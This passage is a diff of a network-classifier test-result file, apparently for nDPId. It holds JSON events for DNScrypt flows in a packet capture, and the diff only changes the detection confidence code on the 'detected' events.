01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":946739317403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAAIcmsZAAL0Rhk4KAAABM56mYeuuAbsCCJzVB14BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAEAAAAAAAAAAAABwwAMAb8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":60334,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":60334,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":286,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":48065,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":946739317403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAAXcmsUgAL0Roo8KAAABM56mYbvBAbsGBA2TB2EBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAEAAAAAAAAAAAAFvwAMBbsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":286,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":48065,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":286,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":48065,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":287,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317403} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":287,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAABQmsUAub0Rx2IKAAABM56mYQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":946739317428,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":946739317428,"pkt":"ZmZmZmZmRERERERECABFAADXKhpAADMRgkAznqZhCgAAAQG7kKsAw\/s4B2KBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAQt4OLzm4x3OBnTPVYOyWbwQ07ZuPzfh5UHeUSDpkuLilk8PnzqIG19XCvUsQGZmTzZ+d2RjpSDvvlP\/+37YoDPjwKVuBVGSevZiWx3QxU\/Ww92uJXMr1\/GUOUVCxbO0A+PApW4FUZJwAAAAFfU6w6X1T9ug=="} @@ -581,28 +581,28 @@ 00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":2,"flow_last_seen":946739317431,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":946739317431,"pkt":"ZmZmZmZmRERERERECABFAADXKhtAADQRgT8znqZhCgAAAQG7uJkAw9NNB1+BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAQt4OLzm4x3OBnTPVYOyWbwQ07ZuPzfh5UHeUSDpkuLilk8PnzqIG19XCvUsQGZmTzZ+d2RjpSDvvlP\/+37YoDPjwKVuBVGSevZiWx3QxU\/Ww92uJXMr1\/GUOUVCxbO0A+PApW4FUZJwAAAAFfU6w6X1T9ug=="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":41717,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":946739317432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAAIc141AAL0RhaIKAAABsDjtq6L1AbsCCGC6smcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":41717,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":41717,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":2,"flow_last_seen":946739317432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":946739317432,"pkt":"ZmZmZmZmRERERERECABFAADXKhxAADMRgj4znqZhCgAAAQG7s\/IAw9f2B12BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAQt4OLzm4x3OBnTPVYOyWbwQ07ZuPzfh5UHeUSDpkuLilk8PnzqIG19XCvUsQGZmTzZ+d2RjpSDvvlP\/+37YoDPjwKVuBVGSevZiWx3QxU\/Ww92uJXMr1\/GUOUVCxbO0A+PApW4FUZJwAAAAFfU6w6X1T9ug=="} 00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":946739317432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":946739317432,"pkt":"ZmZmZmZmRERERERECABFAADXKh5AADMRgjwznqZhCgAAAQG7664Aw6A5B16BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAQt4OLzm4x3OBnTPVYOyWbwQ07ZuPzfh5UHeUSDpkuLilk8PnzqIG19XCvUsQGZmTzZ+d2RjpSDvvlP\/+37YoDPjwKVuBVGSevZiWx3QxU\/Ww92uJXMr1\/GUOUVCxbO0A+PApW4FUZJwAAAAFfU6w6X1T9ug=="} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":294,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":55046,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":946739317432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAAXc144gAL0RoeEKAAABsDjtq9cGAbsGBFSSsmQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":55046,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":55046,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":295,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317432} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":295,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAABQ144Aub0RxrQKAAABsDjtqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":51363,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":946739317432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAAIc149AAL0RhaAKAAABsDjtq8ijAbsCCGC6smUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":51363,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":51363,"dst_port":443,"l4_proto":"udp","ndpi": 